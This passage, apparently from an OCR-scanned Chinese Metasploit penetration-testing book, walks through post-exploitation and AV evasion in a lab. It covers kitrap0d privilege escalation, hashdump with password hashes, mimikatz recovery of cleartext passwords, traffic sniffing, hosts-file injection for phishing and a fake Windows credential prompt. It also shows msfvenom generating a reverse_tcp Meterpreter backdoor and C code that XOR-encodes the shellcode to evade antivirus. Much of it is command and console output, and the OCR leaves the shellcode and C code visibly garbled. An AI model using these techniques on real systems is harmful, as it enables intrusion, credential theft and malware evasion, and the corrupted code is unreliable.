Hgetsystem 命令 获得 系统 级 权限 ， 就 会 遇 到 如 下 错误 。 





meterpreter > getuid 

Server username: WIN-SWIKKOTKSHX\mm 

meterpreter » getsystem 

[-] priv elevate getsystem: Operation failed: Access 
s attempted: 

[-] Named Pipe Impersonation (In Memory/Admin) 

[-] Named Pipe Impersonation (Dropper/Admin) 

[-] Token Duplication (In Memory/Admin) 


is denied. The following wa 

















但 是 遇 到 这 种 情况 时 该 怎么 做 呢 ? 答案 就 是 使 用 后 渗透 模块 将 控制 权限 提高 至 最 高 级 别 。 下 面 的 











演示 是 在 Windows Server 2008 SP1 操作 系统 上 进行 的 , 其 中 使 


日 本 地 渗透 模块 绕 过 了 限制 并 获得 了 目 





标的 完全 管理 权限 。 
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msf expLoit(ms10 015 kitrap0d) > show options 
Module options (exploit/windows/local/msl0 015 kitrapOd): 


Name Current Setting Required Description 


SESSION yes The session to run this module on. 


Exploit target: 


Id Name 


0 Windows 2K SP4 - Windows 7 (x86) 


msf exploit(ms10 015 kitrapüd) > set SESSION 3 
SESSION => 3 
Imsf exploit(ms10 015 kitrap8d) > exploit 


[*] Started reverse TCP handler on 192.168.10.112:4444 
“] Launching notepad to host the exploit... 
Process 1856 launched. 
[*] Reflectively injecting the exploit DLL into 1856... 
[*] Injecting exploit into 1856 ... 
[*] Exploit injected. Injecting payload into 1856... 
[*] Payload injected. Executing exploit... 
Exploit finished, wait for (hopefully privileged) payload execution to compl 
ete. 
[*] Sending stage (957487 bytes) to 192.168.10.109 
[*] Meterpreter session 4 opened (192.168.10.112:4444 -> 192.168.10.109:49175) a 
t 2016-07-10 14:09:42 +0530 





meterpreter > fj 


在 上 面 的 截图 中 ， 我 们 使 用 exploit/windows/10cal/ms10. 015 kitrapoa 渗透 模块 提升 了 
控制 权限 ， 并 获得 了 最 高 级 别 的 管理 权限 。 接 下 来 使 用 getuia 命令 检查 当前 的 权限 级 别 。 
























































meterpreter > getuid 

Server username: NT AUTHORITY\SYSTEM 

meterpreter > sysanto 

Computer WIN-SWIKKOTKSHX 

0S : Windows 2008 (Build 6001, Service Pack 1) 
Architecture : x86 

System Language : en US 

Domain : WORKGROUP 

Logged On Users : 4 

Meterpreter : x86/win32 








我 们 已 经 获得 了 系统 级 管理 权限 ， 现 在 就 可 以 在 目标 系统 上 执行 任何 操作 了 。 





有 关 kitrap0d 渗透 模块 的 更 多 信息 ， 请 访问 https://docs.microsoft.com/en-us/security- 
updates/SecurityBulletins/2010/ms10-015 。 


运行 hashdump 命令 ,检查 这 个 模块 能 否 正常 工作 。 





meterpreter > hashdump 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:01c714f171b670ce8f719f2d07812 
470::: 
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0: : : 
mm: 1000 : aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0: : : 


干 得 不 错 ! 我 们 已 经 获得 了 系统 的 散 列 值 。 
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8.5.7 使 用 mimikatz 查找 明文 密码 


mimikatz 是 Metasploit 中 一 个 功能 极为 强大 的 附加 工具 ， 它 可 以 直接 从 lsass 服务 获取 Windows 
中 状态 为 活跃 的 账号 的 明文 密码 。 虽 然 之 前 我 们 已 经 通过 pass-the-hash 使 用 过 散 列 值 ， 不 过 在 很 多 时 
候 渗透 都 是 把 时 间 放 在 第 一 位 的 ， 知 道 了 密码 就 可 以 节省 大 量 时间 。 男 外 在 HTTP 进行 基本 身份 认证 
的 时 候 ， 也 需要 知道 密码 ( 而 不 是 散 列 值 )。 


可 以 在 Metasploit 中 使 用 10ad mimikatz 命令 载 人 mimikatz 模块 ,之 后 就 可 以 使 用 mimikatz 
模块 中 的 kerberos 命令 来 查找 密码 。 































































































meterpreter > kerberos 

Running as SYSTEM 
[*] Retrieving kerberos credentials 
kerberos credentials 


AuthID Package Domain User Password 
0;999 NTLM WORKGROUP WIN-SWIKKOTKSHX$ 

0;996 Negotiate WORKGROUP WIN-SWIKKOTKSHX$ 

0;34086 NTLM 

0;387971 NTLM WIN-SWIKKOTKSHX mm 

0;997 Negotiate NT AUTHORITY LOCAL SERVICE 

0;995 Negotiate NT AUTHORITY IUSR 

0; 137229 NTLM WIN-SWIKKOTKSHX Administrator Nipun@123 
0;257488 NTLM WIN-SWIKKOTKSHX Administrator Nipun@123 








8.5.8 使 用 Metasploit 进行 流量 嗅 探 


对 了 ，Metasploit 还 提供 了 嗅 探 目标 主机 流量 的 功能 一 一 而 且 不 仅 可 以 嗅 探 特定 网 络 接口 的 流量 ， 
还 可 以 嗅 探 目标 上 所 有 网 络 接口 的 流量 。 我 们 可 以 先 列 出 目标 主机 上 的 所 有 网 络 接口 ， 然 后 选择 列表 cm 


中 的 一 个 。 

1 - 'VMware Virtual Ethernet Adapter for VMnet8' ( type:0 mtu:1514 usable:true dhcp:t 
rue wifi:false ) 
2 - 'Realtek RTL8723BE Wireless LAN 802.11n PCI-E NIC' ( type:0 mtu:1514 usable:true 
dhcp:true wifi:false ) 
3 - 'VMware Virtual Ethernet Adapter for VMnetl' ( type:0 mtu:1514 usable:true dhcp:t 
rue wifi:false ) 
4 - 'Microsoft Kernel Debug Network Adapter' ( type:4294967295 mtu:0 usable:false dhc 
p:false wifi:false ) 
5 - 'Realtek PCIe GBE Family Controller' ( type:0 mtu:1514 usable:true dhcp:true wifi 
:false ) 
6 - 'Microsoft Wi-Fi Direct Virtual Adapter' ( type:0 mtu:1514 usable:true dhcp:true 
wifi:false ) 
7 - 'WAN Miniport (Network Monitor)' ( type:3 mtu:1514 usable:true dhcp:false wifi:fa 
lse ) 
8 - 'SonicWALL Virtual NIC' ( type:4294967295 mtu:0 usable:false dhcp:false wifi:fals 
e) 
9 - 'TAP-Windows Adapter V9' ( type:0 mtu:1514 usable:true dhcp:false wifi:false ) 
10 - 'VirtualBox Host-0nLy Ethernet Adapter' ( type:0 mtu:1518 usable:true dhcp:false 
wifi:false ) 
11 - 'Bluetooth Device (Personal Area Network)' ( type:0 mtu:1514 usable:true dhcp:tr 
ue wifi:false ) 


















































meterpreter » sniffer interfaces 
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目标 主机 上 有 多 个 网 络 接 


下 图 所 示 。 








口 。 现 在 在 无 线 网 络 接口 上 局 动 嗅 探 功 能 ， 这 个 网 络 接口 的 JP 为 2, 如 





meterpreter > sniffer start 2 1000 
meterpreter » sniffer dump 


meterpreter » sniffer dump 2 2.pcap 





[*] PCAP file written to 2.pcap 


[*] Capture started on interface 2 (1000 packet buffer) 
[-] Usage: sniffer dump [interface-id] [pcap-file] 


[*] Flushing packet capture buffer for interface 2... 
[*] Flushed 1000 packets (600641 bytes) 

[*] Downloaded 087% (524288/600641).. 
[*] Downloaded 100% (600641/600641).. 
[*] Download completed, converting to PCAP... 








输入 sniffer start 2 1000 命令 启动 无 线 网 络 接口 上 的 嗅 探 功能 , 其 中 2 表示 无 线 网 卡 的 ID ， 


1000 是 缓冲 区 的 大 小 。 使 月 








H sniffer dump 命令 便 可 以 成 功 下 载 pcap 文件 。 如 果 你 想 查看 在 pcap 


文件 中 收集 了 哪些 数据 包 ， 可 以 使 用 如 下 图 所 示 的 命令 在 Wireshark 中 查看 。 


在 pcap 文件 中 有 大 量 数据 包 ， 





[rootemm: -# wireshark 2.pcap 











其 中 包含 了 DNS 查询 、HTTP 请 求 和 以 明文 保存 的 密码 。 

















Info 

Response 
HTTP/1.1 
HTTP/1.1 
HTTP/1.1 





HTTP/1. 
HTTP/1. 
HTTP/1. 
HTTP/1. 
Response 
Response 
HTTP/1. 

HTTP/1. 


1 
1 
1 
1 


1 
n 
HTTP/1.1 
NOTIFY * 
NOTIFY * 
NOTIFY * 
NOTIFY * 
NOTIFY * 
NOTIFY * 
NOTIFY * 
NOTIFY * 
NOTIFY * 
NOTIFY * 
NOTIFY * 
NOTIFY * 


Filter: | http ~ |Expression.. Clear Apply Save 

No. Time Source Destination Protocol Length 
20 0.000000 117.18.237.29 192.168.10.105 OCSP 842 
130 2.000000 202.125.152.245 192.168.10.105 1299 
170 3.000000 52.84.101.29 192.168.10.105 615 
209 4.000000 202.125.152.245 192.168.10.105 1417 
364 6.000000 202.125.152.245 192.168.10.105 639 
414 7.000000 54.79.123.29 192.168.10.105 1038 
426 7.000000 54.79.123.29 192.168.10.105 497 
471 8.000000 54.79.123.29 192.168.10.105 761 
487 9.000000 96.17.182.48 192.168.10.105 224 
492 9.000000 96.17.182.48 192.168.10.105 224 
543 14.000000 202.125.152.245 192.168.10.105 528 
573 15.000000 202.125.152.245 192.168.10.105 1403 
588 15.000000 202.125.152.245 192.168.10.105 302 
657 16.000000 192.168.10.1 239.255.255.250 SSDP 367 
665 17.000000 192.168.10.1 239.255.255.250 SSDP 376 
673 17.000000 192.168.10.1 239.255.255.250 SSDP 439 
677 17.000000 192.168.10.1 239.255.255.250 SSDP 376 
678 17.000000 192.168.10.1 239.255.255.250 SSDP 415 
681 17.000000 192.168.10.1 239.255.255.250 SSDP 376 
683 17.000000 192.168.10.1 239.255.255.250 SSDP 435 
684 17.000000 192.168.10.1 239.255.255.250 SSDP 429 
817 33.000000 192.168.10.101 239.255.255.250 SSDP 355 
818 33.000000 192. 168.10. 101 239. 255. 255. 250 SSDP 355 
819 34.000000 192. 168.10. 101 239. 255. 255. 250 SSDP 358 
820 34.000000 192. 168.10. 101 239.255. 255. 250 SSDP 358 


200 OK (text/html) 
200 OK (GIF89a) 
200 OK (text/css) 


200 OK (image/x-icon 

200 OK (text/css) 

301 Moved Permanently (text/html) 
200 OK (text/javascript) 


302 Found 

200 OK (text/html) 

200 OK (text/javascript) 
HTTP/1. 
HTTP/1. 
HTTP/1. 
HTTP/1. 
HTTP/1. 
HTTP/1. 
HTTP/1. 
HTTP/1. 
HTTP/1. 
HTTP/1. 
HTTP/1. 
HTTP/1. 


FF PP 








8.5.9 使 用 Metasploit 对 host 文件 进行 注入 


可 以 
的 host 文件 中 。 




















通过 对 目标 主机 的 host 文件 进行 注入 展开 钓鱼 攻击 一 一 将 指定 域名 的 条 目 添加 到 目标 主机 
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下 面 来 看 看 如 何 使 用 Metasploit 实现 对 host 文件 的 注入 。 





msf exploit(handler) > use post/windows/manage/inject host 
msf post(inject host) > show options 


Module options (post/windows/manage/inject host): 


Name Current Setting Required Description 

DOMAIN yes Domain name for host file manipulation. 
IP yes IP address to point domain name to. 
SESSION yes The session to run this module on. 


msf post(inject host) > set DOMAIN www.yahoo.com 
DOMAIN => www.yahoo.com 

msf post(inject_host) > set IP 192.168.10.112 

IP => 192.168.10.112 

msf post(inject_host) > set SESSION 1 

SESSION => 1 

msf post(inject_host) > exploit 


[*] Inserting hosts file entry pointing www.yahoo.com to 192.168.10.112.. 
Done! 
[*] Post module execution completed 











可 以 看 到 我 们 在 会 话 1 中 使 用 了 post/windows/manage/inject host 模块 ,并 在 目标 的 host 
文件 中 添加 了 一 个 条 目 。 现 在 来 看 看 当 目 标 试图 访问 https://www.yahoo.com 时 会 发 生 什 么 














Apache2 Debian Default Page 


This is the default welcome page used to test the correct operation of the Apache2 server after 
installation on Debian systems. If you can read this page, it means that the Apache HTTP server 


installed at this site is working properly. You should replace this file (located at /var/www 
/html/index.html) before continuing to operate your HTTP server. 





If you are a normal user of this web site and don't know what this page is about, this probably means 
that the site is currently unavailable due to maintenance. If the problem persists, please contact the 
site's administrator. 


Configuration Overview 


目标 主机 的 浏览 器 被 定位 到 了 我 们 的 恶意 服务 器 ， 这 个 服务 器 上 运行 着 钓鱼 网 站 。 














8.5.10 登录 密码 的 钓鱼 窗口 


Metasploit 包含 了 一 个 针对 登录 密码 的 钓鱼 窗口 模块 。 它 可 以 生成 一 个 钓鱼 窗口 ， 这 个 窗口 的 外 
观 和 Windows 系统 的 认证 弹 窗 一 模 一 样 。 攻 击 者 可 以 利用 这 个 窗口 来 获取 登录 凭证 。 HT UH FOI Y 
法 的 登录 和 窗口， 用 户 必须 填写 登录 凭证 才能 继续 正在 进行 的 操作 。 我 们 可 以 使 用 模块 post /windows/ 
gather/phish_login_pass 来 实现 对 用 户 登录 凭证 的 钓鱼 式 渗透 测试 。 运行 这 个 模块 的 时 候 , 目标 
上 就 会 弹出 一 个 如 下 图 所 示 的 钓鱼 窗 
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Please enter your credentials. 


User name: G wmswrxorshxmm v]. E) 


Password: 





AT7start| | 4 m E Local Disk (C:) “]] Untitled - Notepad 图 eS 2:20PM 











当 目 标 填写 了 用 户 名 和 密码 之 后 ， 我 们 就 可 以 看 到 以 纯 文 本 形式 保存 的 信息 ， 如 下 图 所 示 。 








meterpreter > run post/windows/gather/phish windows credentials 


PowerShell is installed. 
Starting the popup script. Waiting on the user to fill in his credentials... 


#< CLIXML 


UserName Domain Password 


mm WIN-SWIKKOTKSHX Nipun@123 












































我 们 轻而易举 地 获得 了 目标 的 登录 信息 。 正 如 在 本 章 所 看 到 的 ，Metasploit 提供 了 大 量 用 于 后 渗 
透 的 功能 ， 还 具备 与 独立 工具 ( 例如 mimikatz ) 和 本 地 脚本 协同 工作 的 能 


8.6 小 结 与 练习 

本 章 详 细 介绍 了 后 渗透 模块 ， 以 及 从 基础 到 高 级 的 各 种 后 渗透 测试 场景 。 此 外 ， 还 介绍 了 在 
Windows 环境 中 提升 权限 的 方法 和 高 级 技术 。 

你 应 当 尝 试 进行 如 下 练习 。 
口 开发 自 定义 的 后 渗透 模块 ， 用 来 实现 当前 Metasploit 所 不 具备 的 功能 。 
口 开发 自动 化 脚本 以 实现 权限 的 获取 、 保 持 ， 以 及 痕迹 的 清除 。 
口 尝试 开发 一 款 针 对 Linux 操作 系统 的 Metasploit 后 渗透 模块 。 

在 下 一 章 中 ， 我 们 将 利用 本 章 介绍 的 大 部 分 后 渗透 测试 技巧 来 规避 目标 系统 的 保护 机 制 。 另 外 ， 
我 们 还 将 展示 一 些 最 先进 的 Metasploit 功能 ， 并 尝试 以 此 来 击破 杀毒 软件 和 防火 墙 的 防御 。 
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之 前 的 八 章 已 经 介绍 了 渗透 测试 的 所 有 主要 阶段 。 本 章 将 会 讲解 在 实际 工作 中 渗透 测试 工程 师 经 
常会 遇 到 的 一 些 问题 。 只 需 对 目标 发 起 直接 攻击 ， 然 后 就 可 以 在 Metasploit 中 获得 控制 shell 的 时 代 已 
经 过 去 了 。 在 攻击 范围 不 断 扩 大 的 今天 ， 网 络 的 安全 机 制 也 在 日 益 完善 。 所 以 我 们 需要 掌握 一 些 灵活 
的 方法 来 绕 过 这 些 安全 机 制 。 本 章 将 介绍 目标 上 所 部 署 的 安全 机 制 以 及 规避 这 些 机 制 的 方法 和 技术 。 
本 章 将 着 眼 于 以 下 几 个 要 点 。 

口 如 何 让 产生 的 Meterpreter 攻击 载荷 绕 过 杀毒 工具 的 检查 。 
口 如 何 绕 过 IDS( 入侵 检测 系统 ) 的 检查 。 

Q 如 何 绕 过 防火 墙 检查 和 端口 堵塞 机 制 。 

好 了 ， 现 在 可 以 正式 开始 规避 技术 的 学 习 了 。 



























































9.1 使 用 C wrapper 和 自 定义 编码 器 来 规避 Meterpreter 


Meterpreter 是 安全 研究 人 员 所 使 用 的 最 为 流行 的 攻击 载荷 之 一 了 。 不 过 也 正 因为 它 的 流行 ,使 得 
大 多 数 杀毒 软件 的 病毒 库 中 都 包含 了 它 的 样本 。 一旦 计算 机 上 运行 了 Meterpreter， 它 就 会 迅速 被 杀毒 
软件 查 杀 。 现 在 按照 下 图 所 示 使 用 msfvenom 生成 一 个 简单 的 Metasploit 可 执行 模块 。 


rootGkali:-£ msfvenom -p windows/meterpreter/reverse tcp LHOST-192.168.10.101 LPORT-4444 -f e| 
xe -b '\x00\xða\xðd' > sample.exe 

No platform was selected, choosing Msf::Module::Platform::Windows from the payload 

No Arch selected, selecting Arch: x86 from the payload 

Found 10 compatible encoders 

Attempting to encode payload with 1 iterations of x86/shikata ga nai 

x86/shikata ga nai succeeded with size 368 (iteration-0) 

iX86/shikata ga nai chosen with final size 368 

Payload size: 368 bytes 

Final size of exe file: 73802 bytes 


通过 执行 msfvenom 命令 , 我 们 创建 了 一 个 简单 的 反 向 TCP Meterpreter 后 门 程 序 。 另 外 , 我 们 还 
分 别 为 参数 LHosT 和 LPORT ITIR, 并 指定 了 这 个 程序 的 类 型 为 EXE, 这 是 一 种 PE/COFF 的 可 执行 
格式 。 这 里 我 们 还 使 用 了 参数 -b 来 避免 在 程序 中 出 现 null 字符 、 回 车 符 和 换行 符 这 些 可 能 导致 程序 
失效 的 坏 字 符 。 当 这 条 命令 执行 完毕 之 后 ,我 们 就 可 以 看 到 成 功 生 成 的 可 执行 文件 了 。 接 下 来 将 这 个 
可 执行 程序 移动 到 apache 文件 夹 中 ， 然 后 在 男 外 一 台 运 行 Windows 10 操作 系统 的 主机 中 下 载 并 执行 
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这 个 程序 ， 这 人 台 主 机 中 安装 有 Windows Defender MAE 360 两 个 软件 。 当 然 ， 不 要 忘记 , TE Windows 
系统 中 执行 这 个 程序 之 前 ， 要 先 在 Metasploit 中 启动 对 应 的 handler。 





Iz 
n 


» use exploit/multi/handler 

exploit(multi/handler) » set Payload windows/meterpreter/reverse tcp 
sytond => windows/meterpreter/reverse tcp 

exploit(multi/handler) » set LHOST 192.168.10.101 

HOST => 192.168.10.101 

exploit(multi/handler) > set LPORT 4444 

RT => 4444 

exploit (multi/handler) » exploit -j 

[* ] Exploit running as background job 0. 


EB 
[eh 


3 EP tT: 
h O h 


3 m 
zR SI 








[*] Started reverse TCP handler on 192.168.10.101:4444 





可 以 看 到 ， 我 们 已 经 成 功 地 在 4444 端口 启动 了 对 应 的 handler。 然 后 在 Windows 系统 中 执行 这 个 
Meterpreter 后 门 程序 ， 注 意 观 察 是 否 成 功 获得 了 它 发 回 的 反 向 连接 。 




















$ New Tab 


s 192.168.10.101 


-— 


(9) 260 rorat secuRITY 


The downloaded file contains a Trojan virus. It has been 
quarantined 





360 has identified that the downloaded file contains a Trojan virus, which may infiltrate 
your system and even steal your account passwords, photos or other private 
information. 


Trojan file: Sample.exe 


Risks: Trojan (HEUR/QVM20.1.A243.Malware.Gen) 





| Close | v | 














很 可 惜 ， 看 起 来 杀毒 软件 甚至 都 没 允 许 下 载 这 个 程序 。 实 际 上 ， 如 果 你 不 对 Meterpreter 进行 任何 
处 理 的 话 ， Te 它 几乎 不 可 能 在 目标 系统 中 成 功 完 成 任务 。 接 下 来 快速 地 计算 一 下 Sample.exe 文件 的 
MD5 散 列 值 ， 这 个 过 程 如 下 图 所 示 。 


root@kali:~/Desktop# md5sum /var/www/html/Sample.exe 
|d10bce154701947570c75fe26e386c37 j/var/www/html/Sample.exe 


我 们 不 妨 将 这 个 程序 提交 到 一 个 著名 的 在 线 杀毒 网 站 中 进行 测试 ， 这 个 网 站 的 地 址 为 
http://nodistribute.com/， 测 试 的 结果 如 下 图 所 示 。 
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File 
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看 到 了 吧 ， 这 个 网 站 提供 的 37 个 杀毒 软件 中 有 27 个 成 功 地 将 这 个 程序 识别 为 病毒 。 这 看 起 来 不 
太 妙 ,是 吧 ? 不 过 别 在 意 , 下面 就 来 看 看 如 何 仅 仅 利用 C 语言 和 少量 编码 操作 来 规避 这 种 情况 。 准 备 
好 ， 我 们 开始 了 ! 


使 用 C 语言 一 个 自 定义 的 Meterpreter 编码 /解码 程序 


为 了 绕 过 目标 的 安全 控制 机 制 ， 我 们 可 以 利用 自 定 义 编码 的 方法 ， 例 如 XOR 编码 ， 以 及 其 他 一 
些 编码 方式 。 另 外 , 这 里 的 程序 也 将 不 再 使 用 传统 的 PE/COFF 格式 ,而 是 采用 生成 shellcode 的 方法 。 
这 个 过 程 和 我 们 之 前 使 用 ms fvenom 来 生成 PE 格式 的 例子 基本 一 样 ， 不 同 之 处 在 于 我 们 需要 将 输出 
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格式 改 为 C， 完 整 的 命令 如 下 图 所 示 。 





root@kali:-# msfvenom -p windows/meterpreter/reverse tcp LH0ST-192.168.10.101 LP 
ORT-4444 -f c -b '\x00\xða\xðd' > Sample.c 

No platform was selected, choosing Msf::Module::Platform::Windows from the paylo 
ad 

No Arch selected, selecting Arch: x86 from the payload 

Found 10 compatible encoders 

Attempting to encode payload with 1 iterations of x86/shikata ga nai 
x86/shikata ga nai succeeded with size 368 (iteration-0) 

x86/shikata ga nai chosen with final size 368 

Payload size: 368 bytes 

Final size of c file: 1571 bytes 











下 图 中 给 出 了 Sample.c 文件 的 具体 内 容 。 





root@kali:-# cat Sample.c 

unsigned char buf[] - 
"\xbe\x95\xb2\x95\xfe\xdd\xc4\xd9\x74\x24\xf4\x5a\x31\xc9\xb1" 
"\X56\x83\xc2\x04\x31\x72\x0f\x03\x72\x9a\x50\x60\x02\x4c\x16" 
"\x8b\xfb\x8c\x77\x05\xle\xbd\xb7\x71\x6a\xed\x07\xf1\x3e\x01" 
"\xe3\x57\xab\x92\x81\x7f\xdc\x13\x2f\xa6\xd3\xa4\xlc\x9a\x72" 
"\x26\x5f\xcf\x54\x17\x90\x02\x94\x50\xcd\xef\xc4\x09\x99\x42" 
"\xf9\x3e\xd7\x5e\x72\xQOc\xf9\xe6\x67\xc4\xf8\xc7\x39\x5f\xa3" 
"\xc7\xb8\x8c\xdf\x41\xa3\xdl\xda\x18\x58\x21\x90\x9a\x88\x78" 
"\x59\x30\xf5\xb5\xa8\x48\x31\x71\x53\x3f\x4b\x82\xee\x38\x88" 
"\xf9\x34\xcc\xOb\x59\xbe\x76\xf0\x58\x13\xe0\x73\x56\xd8\x66" 
"\xdb\x7a\xdf\xab\x57\x86\x54\x4a\xb8\xOf\x2e\x69\xlc\x54\xf4" 
"\x10\x05\x30\x5b\x2c\x55\x9b\x04\x88\xld\x31\x50\xal\x7f\x5d" 
"\x95\x88\x7f\x9d\xbl\x9b\xOc\xaf\xle\x30\x9b\x83\xd7\x9e\x5c" 
"\xX92\xf0\x20\xb2\x1c\x90\xde\x33\x5c\xb8\x24\x67\x0c\xd2\x8d" 
"\x08\xc7\x22\x31\xdd\x7d\x29\xa5\xle\x29\x27\x50\xf7\x2b\x38" 
"\x8b\x5b\xa2\xde\xfb\x33\xe4\x4e\xbc\xe3\x44\x3f\x54\xee\x4b" 
"\x60\x44\x11\x86\x09\xef\xfe\x7e\x61\x98\x67\xdb\xf9\x39\x67" 
"\xf6\x87\x7a\xe3\xf2\x78\x34\x04\x77\x6b\x21\x73\x77\x73\xb2" 
"\x16\x77\x19\xb6\xbO\x20\xb5\xb4\xe5\x06\xla\x46\xcO\x15\x5d" 
"\xb8\x95\x2f\x15\x8f\x03\xOf\x41\xfO\xc3\x8f\x91\xa6\x89\x8f" 
"\xf9\xle\xea\xdc\xlc\x61\x27\x71\x8d\xf4\xc8\x23\x61\x5e\xal" 
"\xc9\x5c\xa8\x6e\x32\x8b\xaa\x69\xcc\x49\x85\xd1\xa4\xb1\x95" 
"\xe1\x34\xd8\x15\xb2\x5c\x17\x39\x3d\xac\xd8\x90\x16\xa4\x53" 
"\xX75\xd4\x55\x63\x5c\xb8\xcb\x64\x53\x61\xfc\x1f\xlc\x96\xfd" 
"\xdf\x34\xf3\xfe\xdf\x38\x05\xc3\x09\x01\x73\x02\x8a\x36\x8c" 
"\x31\xaf\x1f\x07\x39\xe3\x60\x02"; 











已 经 准备 好 了 shelleode, 接 下 来 要 使 用 C 语言 来 编写 一 个 编码 程序 。 这 个 程序 可 以 使 用 指定 的 字 
节 来 对 shellcode 进行 XOR 编码 ， 在 这 个 例子 中 将 使 用 0xAA 作为 编码 字 节 ， 过 程 如 下 。 


下 




































































5 编码 程序 
\xbe\x95\xb2... XOR^(AA) \x14\x3f\x18... 
原始 的 shellcode 经 过 编码 的 shellcode 




















看 给 出 了 一 个 使 用 C 语言 编写 的 完整 的 编码 程序 。 
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#include «Windows.h» 

#include "stdafx.h" 

#include <iostream> 

#include <iomanip> 

#include <conio.h> 

unsigned char buf[] = 
"\xbe\x95\xb2\x95\xfe\xdd\xc4\xd9\x74\x24\xf4\x5a\x31\xc9\xb1" 
"NAX56NX83NXC2NX04NX31NX72NX0£NxX03Nx72Nx9aNx50Nx60Nx02Nx4cNx16" 
"\x8b\xfb\x8c\x77\x05\xle\xbd\xb7\x71\x6a\xed\x07\xf1\x3e\x01" 
"Axe3Nx57NxabNx92Nx81Nx7 £Nxdce Nx13Nx2£Nxa6Nxa3Nxa4Nx10Nx9aNx72" 
"\x26\x5f\xcf\x54\x17\x90\x02\x94\x50\xcd\xef\xc4\x09\x99\x42" 
"\xf9\x3e\xd7\x5e\x72\x0c\xf9\xe6\x67\xc4\xf8\xc7\x39\x5f\xa3" 
"\xc7\xb8\x8c\xdf\x41\xa3\xd1l\xda\x18\x58\x21\x90\x9a\x88\x78" 
"\x59\x30\xf5\xb5\xa8\x48\x31\x71\x53\x3f\x4b\x82\xee\x38\x88" 
"\xf9\x34\xcc\x0b\x59\xbe\x76\xf0\x58\x13\xe0\x73\x56\xd8\x66" 
"\xdb\x7a\xdf\xab\x57\x86\x54\x4a\xb8\x0f\x2e\x69\xlc\x54\xf4" 
"\x10\x05\x30\x5b\x2c\x55\x9b\x04\x88\x1ld\x31\x50\xal\x7f\x5d" 
"\x95\x88\x7f\x9d\xbl\x9b\x0c\xaf\xle\x30\x9b\x83\xd7\x9e\x5c" 
"NAX92NX£0NxX20Nxb2Nx10Nx90NxdeNx33Nx5cVxb8Nx24Nx67Nx0cNxd2Nx8d" 
"NAX08NxXC7NX22Nx31NxddNx7dNx29Nxa5bNx1eNx29Nx27NX50Nx£7NX2bNx38" 
"\x8b\x5b\xa2\xde\xfb\x33\xe4\x4e\xbc\xe3\x44\x3f\x54\xee\x4b" 
"\x60\x44\x11\x86\x09\xef\xfe\x7e\x61\x98\x67\xdb\xf9\x39\x67" 
"AXf6NxX87NxX7aNXe3NxX£2NX78NX34NxX04NX7/7NX6DNX21NxX73NX77NX'73NxD2" 
"\x16\x77\x19\xb6\xb0\x20\xb5\xb4\xe5\x06\xla\x46\xc0\x15\x5d" 
"NAXbD8NxX95NAxX2£NX15NxX8£NX03NXO£NXA1NXf£ONxXCÓNX8fNxX91 NXAG Nx89Nx8f" 
"\xf9\xle\xea\xdc\xlc\x61\x27\x71\x8d\xf4\xc8\x23\x61\x5e\xal" 
"\xc9\x5c\xa8\x6e\x32\x8b\xaa\x69\xcc\x49\x85\xd1\xa4\xb1\x95" 
"Axel Nx34Nxd8Nx15Nxb2Nx5cNx17Nx39Nx3dNVxac Vxd8Nx90Nx16Nxa4Nx53" 
"\XxX75\xd4\x55\x63\x5c\xb8\xcb\x64\x53\x61\xfc\xlf\xlc\x96\xfqd" 
"\xdf\x34\xf3\xfe\xdf\x38\x05\xc3\x09\x01\x73\x02\x8a\x36\x8c" 
"\x31\xaf\x1f\x07\x39\xe3\x60\x02"; 


int main() 

{ 

for (unsigned int i = 0; i < sizeof buf; ++i) 
{ 
if (i $ 15 -- 0) 


giri out «e IN s 
} 
unsigned char val = (unsigned int)buf[i] ^ OxAA; 
Std::cout «« "\\x" «« std::hex «« (unsigned int)val; 
} 
-getch(); 
return 0; 


) 

这 是 一 个 非常 简单 的 程序 , 其 中 数组 buf [] 的 值 就 是 我 们 前 面 生成 的 shellcode。 我 们 通过 遍 
历 操作 ， 分 别 将 数组 中 的 每 一 个 字 节 与 0xaa 进行 KOR 操作 ， 并 将 结果 输出 到 屏幕 上 。 编 译 并 
运行 这 个 程序 将 输出 如 下 图 所 示 的 经 过 编码 的 攻击 载荷 。 
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现在 我 们 已 经 获得 了 一 个 完成 了 编码 转换 的 攻击 载荷 ， 下 面 需要 做 的 就 是 编写 
程序 ， 它 的 作用 是 将 当前 经 过 编码 的 攻击 载荷 重 
个 程序 的 最 后 部 分 ， 被 传送 到 目标 上 。 下 面 的 











EN E:\Source\EncoderDecoder\Encoder\Debug\Encoder.exe 


"\x14\x3f\x18\x3f\x54\x77\x6e\x73\xde\x8e\x5e\xf@\x9b\x63\xlb" 
"\xfc\x29\x68\xae\x9b\xd8\xa5\xa9\xd8\x30\xfa\xca\xa8\xe6\xbc" 
"\x21\x51\x26\xdd\xaf\xb4\x17\x1d\xdb\xcð0\x47\xad\x5b\x94\xab" 
"\x49\xfd\x1\x38\x2b\xd5\x76\xb9\x85\xc\x79\xe\xb6\x30\xd8" 
"\x8c\xf5\x65\xfe\xbd\x3a\xa8\x3e\xfa\x67\x45\x6e\xa3\x33\xe8" 
"\x53\x94\x7d\xf4\xd8\xa6\x53\x4c\xcd\x6e\x52\x6d\x93\xf5\x9" 
"\x6d\x12\x26\x75\xeb\x9\x7b\x70\xb2\xf2\x8b\x3a\x30\x22\xd2" 
"\xf3\x9a\xS5f\x1f\x2\xe2\x9b\xdb\xf9\x95\xel\x28\x44\x92\x22" 
"\x53\x9e\x66\xal\xf3\x14\xdc\x5a\xf2\xb9\x4a\xd9\xfc\x72\xcc" 
"\x71\xd@\x75\x1\xfd\x2c\xfe\xe@\x12\xa5\x84\xc3\xb6\xfe\x5e" 
"\xba\xaf\x9a\xf1\x86\xff\x31\xae\x22\xb7\x9b\xfa\xb\xd5\xf7" 
"\x3f\x22\xd5\x37\x1lb\x31\xa6\x5\xb4\x9a\x31\x29\x7d\x34\xf6" 
"\x38\x5a\x8a\x18\xb6\x3a\x74\x99\xf6\x12\x8e\xcd\xa6\x78\x27" 
" \xa2\x6d\x88\x9b\x77\xd7\x83\xf\xb4\x83\x8d\xfa\x5d\x81\x92" 
"\x21\xf1\x8\x74\x51\x99\x4e\xe4\x16\x49\xee\x95\xfe\x44\xe1" 
"\xca\xee\xbb\x2c\xa3\x45\x54\xd4\xcb\x32\xcd\x71\x53\x93\xcd" 
"\x5c\x2d\xdð0\x49\x58\xd2\x9e\xae\xdd\xc1\x8b\xd9\xdd\xd9\x18" 
